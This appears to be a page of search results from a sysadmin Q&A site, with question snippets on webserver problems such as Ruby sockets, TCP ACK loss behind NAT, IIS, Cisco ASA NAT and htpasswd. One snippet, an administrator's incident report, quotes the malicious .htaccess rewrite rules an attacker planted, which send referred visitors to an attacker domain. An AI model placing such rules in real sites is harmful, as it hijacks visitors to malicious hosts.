Search Results

Search found 2291 results on 92 pages for 'webserver'.

Page 10/92 | < Previous Page | 6 7 8 9 10 11 12 13 14 15 16 17  | Next Page >

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • How to output binary data to a socket with Ruby

    - by Earlz
    Hello I have a very simple HTTP ruby server. I want it to simply server a PNG image. So I sent headers like image/png but I think that Ruby is converting the image data to a string first. Here is my relevant code webserver = TCPServer.new('127.0.0.1', 20001) while (session = webserver.accept) #.... file = File.open("tmp_testserve.png", "rb") contents = file.read file.close session.print @content session.close #.... Is this what is happening?

    Read the article

  • Webserver Responses Hanging

    - by drscroogemcduck
    From some networks requesting certain images on our webserver is very flakey. I've looked at tcpdumps on both sides and the server sends back part of the file and the client ACKs the TCP packet but the server never receives the ACK. The servers view: 41 19.941136 212.169.34.114 209.20.73.85 TCP 52456 > http [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=2 42 19.941136 209.20.73.85 212.169.34.114 TCP http > 52456 [SYN, ACK] Seq=0 Ack=1 Win=5440 Len=0 MSS=1360 46 20.041142 212.169.34.114 209.20.73.85 TCP 52456 > http [ACK] Seq=1 Ack=1 Win=65280 Len=0 47 20.045142 212.169.34.114 209.20.73.85 HTTP GET /map/map/s+74-WBkWk0aR28Yy-YjXA== HTTP/1.1 48 20.045142 209.20.73.85 212.169.34.114 TCP http > 52456 [ACK] Seq=1 Ack=522 Win=6432 Len=0 49 20.045142 209.20.73.85 212.169.34.114 TCP [TCP segment of a reassembled PDU] (Part of the content of the image 2720 bytes. i assume it is reassembled in tcpdump and it is fragmented over the wire.) ** never receives the ACK sent in frame 282 and will eventually resend the tcp segment ** The clients view: 274 26.161773 10.0.16.67 209.20.73.85 TCP 52456 > http [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=2 276 26.262867 209.20.73.85 10.0.16.67 TCP http > 52456 [SYN, ACK] Seq=0 Ack=1 Win=5440 Len=0 MSS=1360 277 26.263255 10.0.16.67 209.20.73.85 TCP 52456 > http [ACK] Seq=1 Ack=1 Win=65280 Len=0 278 26.265193 10.0.16.67 209.20.73.85 HTTP GET /map/map/s+74-WBkWk0aR28Yy-YjXA== HTTP/1.1 279 26.365562 209.20.73.85 10.0.16.67 TCP http > 52456 [ACK] Seq=1 Ack=522 Win=6432 Len=0 280 26.368002 209.20.73.85 10.0.16.67 TCP [TCP segment of a reassembled PDU] (Part of the content of the image. Only 1400 bytes.) 282 26.571380 10.0.16.67 209.20.73.85 TCP 52456 > http [ACK] Seq=522 Ack=1361 Win=65280 Len=0 The network we are having trouble with is NATd. Is there any kind of explanation for this weirdness?

    Read the article

  • Having IIS remote management problem with my vista machine managing Server 2008 IIS 7.5

    - by Breadtruck
    I am trying to use IIS 7 Remote Management installed on Vista Ultimate SP1. Connection is to IIS 7.5 on Windows Server 2008 Webserver R2. Tried on both full & core install. When I connect up, the console wants to download and install new features. Microsoft.Web.Management.IisClient 7.5.0.0 Microsoft.Web.Management.AspnetClient 7.5.0.0 I check the boxes and click OK and it downloads them and asks if I want to install them, but after I click run it just quits. I tried just choosing one or the other, same thing. I ran IIS Remote tool as administrator. These features installed correctly on my XP machine. Any ideas? UPDATE : If I had any Rep I would offer like 500 rep to get this fixed!

    Read the article

  • Cisco ASA 5510 ASDM: Setting up multiple public static ip addresses on a single interface and route

    - by ssjaken
    HI, i have a cisco ASA 5510 using ASDM version 6.3 We have a webserver that is been written very specifically and i was given super direct "DO NOT DEVIATE" directions. This server has to get traffic from 3 different PUBLIC ip's that we own. (our isp gave use a block of 12 static addresses) on 4 different ports. there are the directions i was given externalIP1:22 - 172.17.5.50:22 - SSH externalIP1:443 - 172.17.5.50:23040 - SIT externalIP2:443 - 172.17.5.50:33040 - STAGE externalIP3:443 - 172.17.5.50:43040 - PROD My first question is, using ASDM (my contract employer demands i use ASDM over CLI) how do i get three public addresses to work on one interface. We are authenticating on PPPoE. I know create a virtual interface with the static address but when i do i cannot ping the address from another offsite machine. secondly, where would i put the traffic redirect in. would i go ahead and create ACL's or just make NAT routes. Thanks.

    Read the article

  • What consequences to take from what i read in logfiles?

    - by Helene Bilbo
    Since some weeks i manage my first Webserver, a Seaside application behind an Apache proxy on Linode, and i installed logwatch to send me daily logs. Where can i get information on when i have to act as a consequence of what i read in these logwatch reports? For example i read that all kinds of people try to login on funny nonexisting accounts or all kinds of webcrawlers test for nonexisting cms login pages, some ip adresses get banned and unbanned by fail2ban... I assume that's normal? Is it? But how do i know that i probably have to do something? What do i look for in the logs?

    Read the article

  • Password protect web directory with htpasswd on Cherokee

    - by wdkrnls
    I have a directory on my Cherokee webserver that I am trying to password protect so that when I try to enter it from a web browser, I get a pop up demanding username and password. Needless to say I am getting stuck. I have created the .htaccess file with: AuthUserFile /srv/http/protected AuthGroupFile /dev/null AuthName "Protected Stuff" AuthType Basic Require valid-user And I used the apache-tools' htpasswd command: htpasswd -c .htpasswd wdkrnls I configured Cherokee with a behavior rule on the /protected directory which requires htpasswd authentication and restarted. I get Error 405 Method Not Allowed whenever I navigate there in a directory. What more do I need to do? Thanks for your help.

    Read the article

  • Solaris Administration Web GUI?

    - by Robert C
    I recently installed Solaris 11 x86 text install (http://www.oracle.com/technetwork/server-storage/solaris11/downloads/index.html?ssSourceSiteId=ocomen) to be used as a file server running ZFS. I noticed that I'm given the bare minimum in terms of packages. Is there an official oracle web GUI for managing ZFS? I ran a netstat and it doesn't appear to have installed any webserver thats listening. I saw something from a couple years ago, but apparently it's not packaged or maintained anymore (https://blogs.oracle.com/talley/entry/manage_zfs_from_your_browser). I tried pkg install network-console, but it says that the package isn't available for my platform. Any ideas? I'd like to stick with Oracle Solaris instead of the open source alternatives, if possible.

    Read the article

  • securing server to server http post

    - by ad-inf
    Website is developed on JSF, Servlet, using apache web server. In my website, I accept data submission from few restricted websites using HTTP POST method. We exchange some secure key to ensure that correct source is sending data. But is there any way to ensure that the data is submitted from specific domain / IP address only? In application level I can check request.header('Referer') , but some proxy or firewall might hide the referer. Can this configuration done on firewall or webserver level to authenticate server to server communication? Eg. Say my website is a payment gateway website, integrated with www.abc.com. I want only abc.com to submit data. So a user using abc.com should be able to submit data to my website only through abc.com, and not any other website.

    Read the article

  • Forward a port with modem (with built-in but disabled router) + a separate router

    - by Youn
    I have a Motorola SBG6580 that is a modem and a wireless router in one. However, the wireless router part was bad so I disabled it and got a separate wireless router. I can go into the configuration pages of both the modem and the router now, and I'm confused as to which device needs to be configured for port-forwarding. I have a raspberry pi that I want to set up as a webserver. Do I configure the router, the modem, or both? Right now, the SBG6580's 1st LAN is connected to the wireless router's WAN, and the internet is working well. Note that the SBG6580 only has 4 ports, and I'm assuming they're LAN,as they are not labeled.

    Read the article

  • I got this message from my host "Exceeded allocated monthly traffic" want to understand problems tha

    - by Amr ElGarhy
    I have a dedicated windows 2008 server and with Allocated monthly traffic: 1500GB, the hosting company sent me "Please take note that the allocated traffic included with your Budget (calculated by GB of traffic) has been exceeded. You will be billed for the exceeding traffic at the end of the month according to the per GB exceeding traffic fee specified on your contract." I checked my Google analytics account and didn't find any big different for the websites traffic this month than previous months. I just want to understand what may cause this sudden increase in traffic this month? may be ftp access? remoting to webserver too much time? or what may cause this? Also, is there any tool in the server to know where the traffic went?

    Read the article

  • Can a web server and XBMC HTPC co exist happily?

    - by Mild Fuzz
    I have a machine that is currently dedicated to running my home theatre. It is way more powerful than it needs to be, and spec wise would have no problem running both a few websites and an HTPC What I wanted to know is that is this was a reasonable thing to expect of a single machine? 90% of the time, all it's power would be just for the web server ( and the odd torrent) Currently it's running Windows, but I am pretty sure I will have to turn it into a Linux box Will I run into any problems? Is there anything I need to know before I start? Any prerequisites? The webserver will be required to run Ruby on Rails sites mainly, but might be called upon to run PHP for Wordpress also.

    Read the article

  • Nginx & Lua: Hacks, optimizations & observations

    - by Quintin Par
    Following this post on using Lua to increase nginx’s flexibility and in reducing load on the web stack I am curious to know how people are using Lua to enhance nginx’s capability. Are there any notable hacks, optimizations & observations using Lua? Hacks that people have used to discover capability with Nginx that would otherwise be complicated/impossible with a webserver or reverse proxy? Edit: Links: http://thechangelog.com/post/3249294699/super-nginx-killer-build-of-nginx-build-for-luajit-plus http://skillsmatter.com/podcast/home/scripting-nginx-with-lua/te-4729 http://devblog.mixlr.com/2012/06/26/how-we-use-nginx-lua-and-redis-to-beta-ify-mixlr/

    Read the article

  • Serving static web files off a non-standard port

    - by Nimmy Lebby
    I'm close to deploying a Django project to production. I'm looking over some infrastructure decisions. Something that came up was serving static files with a different server such as lighttpd. However, we're starting off with a single dedicated server so our only option would be to use a non-standard port for the static file webserver. Is there precedence for this? I.e. Does anyone "big" do this? Any particular port I should use or shy away from using? Can anyone thing of some downsides of going this route?

    Read the article

  • linux recommendations for older pc

    - by jdamae
    Hi, I'm new to Linux and I am interested in installing the OS on an older computer I have. I want to setup a webserver and install php, perl. My pc is an older HP Pavillion a255c, Intel Pentium 4 with 512ram. I will probably add some more memory later. This pc is more like a sandbox than anything, but would like to get quickly started with the OS. Is there a particular flavor of linux I would need to download based on my older computer? Any recommendations? I was thinking about Ubuntu but not sure what version to go with. Thanks for your help.

    Read the article

  • Use teamviewer for running web server [closed]

    - by Steve
    I have a PC behind NAT. I want to host a web server on it which is accessible from the internet. I cannot open any blocked ports nor do i have admin rights on the computer. But it has a teamviewer client running on it 24*7 to which i do have access(no vpn installed). I can accesss this client from anywhere using teamviewer. I want to know if somehow i can use teamviewer to get a ip/hostname that is accessible from the internet and host a webserver. Also is it possible to get an ip if i get admin access but without opening ports.

    Read the article

  • Can't copy Ilias-folder via FQDN, but via ip-address?

    - by Lars
    I have an Ilias-Installation, which is available through two virtual hosts: the FQDN and the ip-address. The first server is ssl only, the second plain http. Both configuration files look the same except for the SSL-part: SSLEngine on SSLCertificateFile /etc/apache2/ssl/ilias.pem In the Ilias-Webinterface, I can copy a folder on the plain http. But if I try to copy the same folder on the ssl virtual host, I get the notice, that the copy was started (rough german translation here), but the folder does not show up. There are no errors in the error-logs of php or the webserver and as said, no differences beside the ssl-part. The guys at an ilias-forum did not have an idea, either. Any ideas in here?

    Read the article

  • Cannot connect to apache web server over internet

    - by user1658093
    I can access my apache 2.2 webserver from the lan ( at this case I use local IP aadress ) but I cannot connect externally ( from another network ). I changed apache to listen port 800, forwarded same port from router control panel, turned off windows and router firewalls. I use whatsmyip.com to get IP with what I try to connect. When I'm trying to connect I use : [whatsmyip.com IP]:800. Also, I can ping server IP externally. OS is windows7. Any ideas, suggestions? Thanks

    Read the article

  • Which modules can be disabled in apache2.4 on windows

    - by j0h
    I have an Apache 2.4 webserver running on Windows. I am looking into system hardening and the config file httpd.conf. There are numerous load modules and I am wondering which modules I can safely disable for performance and / or security improvements. Some examples of things I would think I can disable are: LoadModule cgi_module others like LoadModule rewrite_module LoadModule version_module LoadModule proxy_module LoadModule setenvif_module I am not so sure they can be disabled. I am running php5 as a scripting engine, with no databases, and that is it. My loaded modules are: core mod_win32 mpm_winnt http_core mod_so mod_access_compat mod_actions mod_alias mod_allowmethods mod_asis mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_groupfile mod_authz_host mod_authz_user mod_autoindex mod_dav_lock mod_dir mod_env mod_headers mod_include mod_info mod_isapi mod_log_config mod_cache_disk mod_mime mod_negotiation mod_proxy mod_proxy_ajp mod_rewrite mod_setenvif mod_socache_shmcb mod_ssl mod_status mod_version mod_php5

    Read the article

  • Own website fails to load first time

    - by AmazingDreams
    I have a website running on a VPS, every time I first try to load the website the connection times out. If I press try again, it loads directly. I'm not sure whether this is a DNS issue or a server issue. As far as I know everything is set up correctly. Also, it has been doing this from the moment I got this server and set up my domain name. And that's about two to three months ago. You may take a look here: http://www.wegotcha.nl/ As you can see at this moment it's just an image, there are no scripts running in the background or anything. The only error Apache gives me is that favicon.ico cannot be found. It's an Apache webserver running on Ubuntu 12.04.1 (newest version) I update all packages almost every day (apt-get update && apt-get upgrade). I am merely an amateur on the area of webservers so any help will be appreciated. :)

    Read the article

  • Web server suddenly stopped working

    - by wezten
    I have a web server, which was working fine. It also was an FTP server and a Windows Remote Desktop server, all working fine. Someone called our ISP to increase the internet speed, and suddenly nothing works - I can connect with Teamviewer, but HTTP, FTP & RD doesn't work. Disabled firewall. Ran Wireshark - the packets don't come through at all. Set the webserver to port 20111, in case the ISP is blocking port 80, and again, the packets didn't come through at all. (localhost:20111 works fine) Port forwarding is set up for ports 80, 21, 3389 & 20111 to 10.0.0.32 (which is the correct address - checked with ipconfig). Restarted router and computer. I would be very grateful for any help.

    Read the article

  • I'll be setting up a dedicated web server at work soon, my first non hobby server - What should I know?

    - by Rogue Coder
    I've been running my own dedicated server running CentOS and a LAMP stack for 2-3 years now, but it's only been hosting my own websites which aren't super important. However, I will soon be setting up a Linux Webserver and Linux Database Server at work, and I'm wondering what are some important things I should be doing. It's an internal server only, so only people in the company can access it. Should I get a slave server for both of my servers for backups? If I do this, how many backups should I be keeping and how often should those backups be done? Right now on my current server I run a cron job nightly to backup my MySQL databases (Usually 40mb files once compressed), and bi-weekly cron jobs to backup my web root. I just store these files on my local computer via FTP. Also, for an internal server like this, should I look at using LightHTTPD or NginX to increase performance, or will Apache be fine?

    Read the article

  • Best network tuning variables for a Linux proxy

    - by smarthall
    What are the best settings to tune so that Linux can handle a very large amount of TCP connections such as would be seen by a proxy server or a webserver? I'm using Centos6 and squid and am seeing a large amount of TIME_WAIT connections backing up until finally the machine stops responding. The machine isn't loaded at the time, and is having trouble making ingoing and outgoing connections. I've had several suggestions of tuning /proc/sys/net/ipv4/tcp_tw_reuse and /proc/sys/net/ipv4/tcp_tw_reuse but they mention bad interactions with load balancers and NAT both of which are used in my situation.

    Read the article

  • Update a DNS to a for a dynamic IP

    - by zobgib
    I want to use my schools connection as a place to host a small webserver but one problem I have run into is anytime my server reboots I am given a new IP inside the schools range. All of the schools IP are public and therefor I can access my computer directly over WAN just via the IP given in ifconfig. I would like to be able to give my computer a dns which is easy enough when I change the Arecords to match the current IP of my computer. The problem is if my computer ever reboots (my school regularly cycles power at night and over holidays) I am assigned a new IP and have to realize it then update the Arecords This is inconvenient and I figure there must be a better way to keep the DNS records updated either via a script or my own BIND server. That way if there is a power cycle I can still access the server via a Domain Name. If you have any direction to point me in it would be much appreciated. I am running Ubuntu 10.04 if that helps :).

    Read the article

  • Eliminate single point of failure for webservers?

    - by George Bailey
    I know in DNS, that each of the DNS servers will be tried to see if they will respond I know in email that in the event of a failure it will go to the next one in the list or it will hold the mail for a period of time As far as I know,, in webservers,, the browser will get one of the webserver IP addresses and try it and if it fails it will give up. Is this correct? If so,, then the only way to direct traffic away from a failed IP address would be with the DNS servers.. and even that would not update immediately?

    Read the article

< Previous Page | 6 7 8 9 10 11 12 13 14 15 16 17  | Next Page >